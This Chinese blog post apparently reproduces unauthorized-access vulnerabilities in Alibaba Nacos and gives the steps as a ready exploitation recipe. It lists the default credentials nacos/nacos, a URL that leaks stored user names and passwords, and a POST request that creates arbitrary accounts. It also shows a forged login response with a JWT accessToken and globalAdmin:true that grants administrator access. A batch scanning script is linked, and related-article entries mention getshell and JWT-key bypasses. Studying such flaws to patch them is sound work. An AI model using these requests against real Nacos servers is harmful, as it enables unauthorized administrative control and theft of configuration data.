Nacos未授权访问漏洞复现

已于 2023-07-13 14:51:05 修改
阅读量1.2k 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全
于 2023-07-09 16:37:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/apple_52661176/article/details/131623950
版权

1 弱口令:nacos/nacos

http://ip:8848/nacos

 以上网址是默认登录页面地址,如图

 尝试用弱口令nacos/nacos登录。

2 账号及密码泄露

http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=9

访问以上地址可以获取到已有的用户名和密码,如图

3 创建任意用户

POST http://ip:8848/nacos/v1/auth/users?username=test1&password=test1

抓包将GET改成POST提交,即可创建任意用户

 使用创建的test1/test1 用户成功登录

4 未授权访问

更改登录时的回包,即可直接管理员权限登录,回包内容如下:

HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

将此回包更改

更改成以下内容

nacos用户成功登录 

5 批量检测脚本

https://github.com/tonmonkey/TNacos

脚本来源:

基于Python3对Nacos相关漏洞的检测脚本编写 | Tommonkey

 

 

gnolnaituil
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试漏洞复现nacos授权访问漏洞复现并getshell
HACKONE的博客
03-30 688
nacos授权访问
Nacos授权访问复现及修复
大数据姐姐
01-22 3406
Nacos授权访问修复,开启鉴权
Nacos漏洞总结复现
heike_Ch的博客
04-23 1179
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Alibaba Nacos授权访问漏洞复现
zyl404的博客
01-26 5020
Alibaba Nacos授权访问漏洞复现 漏洞概述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。 通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 环境搭建 下载地址 https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nac
Nacos 授权访问漏洞复现
weixin_58609150的博客
07-08 621
POST http://IP:端口/nacos/v1/auth/users?漏洞地址:GET http://IP:端口/nacos/v1/auth/users?输入任意密码bp抓包修改返回包即可绕过进入后台。抓包将get方式修改为post并重放。
Nacos授权访问漏洞复现,2024年最新网络安全基础开发入门
2401_84181309的博客
04-10 685
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
漏洞复现】Alibaba Nacos 授权访问漏洞
Nday_Seeker
03-20 1211
Alibaba Nacos中存在授权访问漏洞,该漏洞源于com.alibaba.nacos.core.auth.AuthFilter#doFilter在处理服务间通信时存在默认鉴权白名单,其代码在解析请求时,会判断User-Agent值,只要是以Constants.NACOS_SERVER_HEADER字符串(Nacos-Server)开头,则跳过后续的任何鉴权。攻击者可利用该漏洞发送特殊数据绕过身份认证,从而调用任何接口,获取内部数据或添加任意用户,进一步利用甚至可能执行恶意代码。
Nacos授权访问漏洞复现,2024年最新网络安全高级工程师面试题
2401_83946722的博客
04-13 573
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!(img-Jzh9TTJd-1712972311103)]访问以上地址可以获取到已有的用户名和密码,如图。抓包将GET改成POST提交,即可创建任意用户。使用创建的test1/test1 用户成功登录。以上网址是默认登录页面地址,如图。
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
该程序可能通过发送特定的HTTP请求,模拟攻击者的尝试,来检测NACOS服务器是否允许授权访问。如果返回的结果表明可以成功绕过身份认证,那么就证明了NACOS服务器存在这个安全漏洞。 为了防止此类漏洞对系统造成...
Nacos oracle专用
02-27
Nacos是一款由阿里巴巴开源的分布式服务治理和配置中心,它主要功能包括服务发现、配置管理、健康检查等。在特定场景下,Nacos可以与Oracle数据库进行集成,以满足更高级别的持久化需求。本篇文章将详细介绍如何在...
nacos 2.2.3版本
06-29
Nacos 2.2.3版本中,重点是修复了之前版本存在的安全漏洞和性能问题,以提高系统的稳定性和安全性。 首先,让我们深入了解Nacos的核心功能: 1. **服务发现**:Nacos作为一个服务中心,可以让服务提供者注册自己...
nacos中数据库数据导入
02-05
nacos中数据库数据导入
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 648
轻量部署,安全和业务连续性才能两不误
内网安全:IPC横向
最新发布
8888的博客
07-23 660
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 249
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
从等保测评看行业安全趋势:洞察与预测
A526847的博客
07-23 659
从等保1.0到等保2.0,我们看到了保护范围的扩展、综合防御体系的构建、定级灵活性的增强以及定级流程的严格化。来,随着新技术的不断涌现,等保测评的标准和方法还将继续更新和完善。云计算、物联网、大数据等新兴领域的发展,为等保测评提供了新的应用场景。因此,等保测评需要面向这些新兴领域,制定专门的测评标准和方法,确保其安全性得到有效保障。企业需要组建专业的测评团队,并对其进行必要的培训,以确保测评的准确性和有效性。等保测评将更加注重对新技术的评估和应用,确保新技术在提升系统安全性的同时,不会带来新的安全隐患。
nacos授权访问漏洞 修复
07-15
对于Nacos授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制只有授权的用户或者IP可以访问Nacos。可以使用Nacos的权限管理功能来实现。 3. 强化认证和授权:启用强密码策略,使用复杂的密码,并定期更换密码。确保只有授权用户具有适当的权限来访问和管理Nacos。 4. 防火墙设置:配置防火墙来限制对Nacos访问,只允许来自可信源IP地址的请求。 5. 安全审计日志:启用安全审计日志功能,记录所有关键操作和访问日志。这有助于发现异常行为和及时应对潜在的安全威胁。 6. 定期备份:定期备份Nacos的数据,以防止数据丢失或损坏。备份可以帮助你在遭受攻击或数据丢失时快速恢复。 7. 安全漏洞扫描和测试:与安全团队合作,进行定期的安全漏洞扫描和安全测试,以发现并修复潜在的安全问题。 8. 及时响应:如果你发现任何安全问题或漏洞,应立即采取措施进行修复和调查。可以向Nacos官方团队报告漏洞,并升级到已修复漏洞的版本。 请记住,安全是一个持续的过程,需要不断地关注和改进。通过以上措施,你可以提高Nacos安全性,并减少授权访问漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值